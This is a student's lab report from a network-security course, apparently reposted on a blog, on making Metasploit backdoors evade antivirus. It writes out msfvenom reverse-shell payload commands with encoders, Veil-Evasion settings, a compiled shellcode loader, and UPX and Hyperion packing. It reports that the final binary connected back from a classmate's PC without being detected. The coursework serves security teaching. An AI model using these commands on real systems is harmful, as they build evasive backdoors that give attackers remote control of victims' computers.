20165214 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 Week5

《网络对抗技术》Exp3 免杀原理与实践 Week5

一、实验内容

  • 1、正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程;

  • 2、通过组合应用各种技术实现恶意代码免杀;

  • 3、用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本;

二、实验步骤

步骤一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程;

msf尝试
  • 1、在命令行输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=172.20.10.3 LPORT=5214 -f exe > 5214msf.exe,生成5214msf.exe。将5214msf.exe上传到Virus Total进行检测,检测结果如下,有50个杀软检测出来了。
    1271410-20190331134516302-1080723117.png

  • 2、上面是只进行一次编码,接下来编码十次:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=172.20.10.3 LPORT=5214 -f exe > 5214msf-10.exe。再把它上传到VirusTotal,检测结果如下:
    1271410-20190331140044924-1877748957.png

可以看到还是有48个杀软检测出来了,编码多次和编码一次的免杀效果差别不大。因为我们使用的是同样的模板,杀软只要针对这个模板有所防备就行了,

使用msf生成其他格式的文件(参考博客Metasploit之多种后门生成
  • 1、生成jar:msfvenom -p java/meterpreter/reverse_tcp LHOST=172.20.10.3 LPORT=5214 W >5214msf-java.jar,检测结果:
    1271410-20190331142702454-911399362.png

  • 2、生成php:msfvenom -p php/meterpreter/reverse_tcp LHOST=172.20.10.3 LPORT=5214 -f raw >5214msf-php.php,检测结果:
    1271410-20190331142827890-19604334.png

  • 3、生成jsp:msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.20.10.3 LPORT=5214 R >5214msf-jsp.jsp,检测结果:
    1271410-20190331143153305-371602138.png

veil-evasion的尝试
  • 1、安装Veil-Evasion。
    • 参考同学的博客,先执行
    mkdir -p ~/.cache/wine
    cd ~/.cache/wine 
    wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
    wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
    • 安装Veil-Evasion:sudo apt-get install veil-evasion
    • 输入veil打开veil,第一次打开时需要进行安装
      这应该是这个实验最最最最花时间的部分了。。和各位同学遇到的问题一样,我也是各种卡,卡%16,%25,%91等等等等。但是我一直等了下去,等了4、5个小时,之间经历了断网重来,中间还又装了和Python相关的3、4个软件,令人绝望。后来终于下好了!输入veil后出现界面:
      1271410-20190331142152132-1743549288.png
  • 2、打开veil后,先输入use evasion进入evasion界面。
    1271410-20190331142402346-2035353548.png

  • 3、生成后门程序
    • 输入use c/meterpreter/rev_tcp.py
      1271410-20190331143225333-249827545.png

    • 输入set LHOST 172.20.10.3设置回连地址(这里的IP地址是kali虚拟机的ip地址)
    • 输入set LPORT 5214设置回连端口
    • 输入generate生成文件
    • 最后输入你想要给后门程序起的名字,这里我输入的是5214-veil。成功生成文件:
      1271410-20190331143319580-986915683.png
      文件默认在/var/lib/veil/output/compiled/5214-veil1.exe

  • 4、使用VirusTotal进行检测,发现还是有37个杀软能够检测出来:
    1271410-20190331144035137-876344770.png

使用shellcode编程
  • 1、在命令行中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.3 LPORT=5214 -f c来生成C语言格式的ShellCode数组。
    1271410-20190331145515010-1387245372.png

  • 2、创建5214-shell.c创建.c文件,输入下图中的代码,其中buf数组中的值就是上面生成的。
    1271410-20190331145947327-1964748649.png

  • 3、输入i686-w64-mingw32-g++ 5214-shell.c -o 5214-shell.exe进行编译。将得到的5214-shell.exe先使用VirusTotal进行检测,结果如下:
    1271410-20190331150337577-1709332284.png

  • 4、打开msfconsole,再在本机上打开5214-shell.exe,此时发现无法连接(但是在下面加壳过后就可以连接上了)

  • 5、结合使用不同编码器:msfvenom -p windows/meterpreter/reverse_tcp -e x86/bloxor LHOST=172.20.10.3 LPORT=5214 -f c
    1271410-20190331152153710-474664608.png

  • 6、创建5214-shell-extend.c创建.c文件,输入下图中的代码,其中buf数组中的值就是上面生成的(buf太长,省略一部分)。
    1271410-20190331152517755-750092228.png

  • 7、输入i686-w64-mingw32-g++ 5214-shell-extend.c -o 5214-shell-extend.exe进行编译。将得到的5214-shell-extend.exe先使用VirusTotal进行检测,结果如下:
    1271410-20190331152738230-1996202760.png

加壳工具

加壳是对相应的资源进行压缩,压缩后仍可运行。它可以用来保护版权,但同时许多病毒也利用它来作为原理。接下来将使用压缩壳和保密壳来进行试验。

  • 1、压缩壳(UPX)
    • 输入upx 5214-shell.exe -o UPX5214-shell.exe进行加壳
      1271410-20190331162225949-345764695.png

    • 加壳后进行检测,如下:
      1271410-20190331162647558-1623747728.png

    • 尝试进行回连,成功:
      1271410-20190331162713016-187338909.png

  • 2、加密壳Hyperion
    • 考虑到下一步就是组合技术实现免杀,所以我就直接把加压缩壳后的文件直接再加加密壳。

    • 将UPX5214-shell.exe复制到/usr/share/windows-binaries/hyperion/

    • 在目录/usr/share/windows-binaries/hyperion/下输入wine hyperion.exe -v UPX5214-shell.exe HyperionUPX5214-shell.exe再次进行加壳:
      1271410-20190331163523122-283232115.png

    • 进行免杀检测:
      1271410-20190331164141791-1760362105.png

    • 尝试进行回连:
      1271410-20190331170922898-1862807817.png

步骤二:通过组合应用各种技术实现恶意代码免杀;

  • 开启360,把在步骤一中最终生成的hyUPX5214-shell.exe放到本机中,发现没有被查杀:
    1271410-20190331172542621-1977334226.png

步骤三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本;

  • 把文件发到同学的电脑上(装有腾讯管家13.0.19837.233),没有被杀掉。
    1271410-20190331194111182-1240295486.png

  • 在我的kali上打开msfconsole,然后在同学的电脑上运行后门程序,成功连上
    1271410-20190331194209817-95711456.png

三、遇到的问题

  • 1、在使用msf生成的shellcode编译成文件来尝试进行回连时失败了,但是加壳后回连就成功了。现在还没有发现其原因。

  • 2、老师的指导书中一些说杀软杀不出来的地方,结果杀软都杀掉了。。。这是不是也说明了杀毒软件也是在不停发展的?我们实验所用的处理软件都是比较常用的,加上我们的步骤都是比较简单的,很容易成为杀软的识别对象。

四、基础问题问答

  • 1、杀软是如何检测出恶意代码的?
  • 答:基于特征码的检测:简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。
    启发式恶意软件检测:对恶意软件检测来主说,就是如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,就把它当成一个恶意软件进行检查。典型的行为如连接恶意网站、开放端口、修改系统文件,典型的“外观”如文件本身签名、结构、厂商等信息等。
    基于行为的恶意软件检测:基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式

  • 2、免杀是做什么?
  • 答:免杀就是让安插的后门不被AV软件发现

  • 3、免杀的基本方法有哪些?
  • 答:
  • 改变特征码
    • 如果你手里只有EXE
      • 加壳:压缩壳 加密壳
    • 有shellcode(像Meterpreter)
      • 用encode进行编码
      • 基于payload重新编译生成可执行文件
    • 有源代码
      • 用其他语言进行重写再编译(veil-evasion)
  • 改变行为
    • 通讯方式
      • 尽量使用反弹式连接
      • 使用隧道技术
      • 加密通讯数据
    • 操作模式
      • 基于内存操作
      • 减少对系统的修改
      • 加入混淆作用的正常功能代码
  • 4、开启杀软能绝对防止电脑中恶意代码吗?
  • 答:从实验中就可以知道不可以。

五、心得体会

这次实验让我知道了有很多杀毒软件其实是不管用的,一些简单的操作就能够迷惑他们。但是,杀毒软件也是不断地在更新的,以前学长学姐们可以正常存留下来的程序,我在做的时候就都被杀软发现了。感觉实验还是很有趣的,毕竟和现实练习是很密切的。这次实验让我感受到了免杀的强大力量,也让我感受到了自己的能力有限。今后应加强学习,不断提高自己的网络安全能力。

转载于:https://www.cnblogs.com/zhuwenyuan/p/10629279.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值